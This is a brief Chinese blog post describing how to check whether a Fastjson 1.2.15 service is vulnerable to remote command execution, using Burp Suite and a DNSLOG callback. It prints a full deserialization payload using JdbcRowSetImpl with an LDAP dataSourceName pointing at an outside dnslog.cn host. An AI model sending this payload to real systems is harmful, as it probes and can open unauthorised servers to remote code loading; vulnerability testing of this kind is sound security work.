利用DNSLOG测试Fastjson远程命令执行漏洞

 

  由于内容比较简单,我直接贴图,怕我自己忘了。

 

  测试Fastjson版本号:1.2.15

 

  直接发送用burpsuite发送payload,将dataSourceName改成dnslog获取到的域名。

 

  payload:

{

    "a":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"ldap://6v0jfv.dnslog.cn

",

        "autoCommit":true

    }

}

 

 

 

 

 

  若刷新DNSlog有记录增加,那说明漏洞存在,反之,则不存在。

 

 

 

 

 

如有错误,请及时指正,谢谢!

 

posted @ 2020-08-04 12:01  怪盗积德  阅读(2885)  评论(0编辑  收藏  举报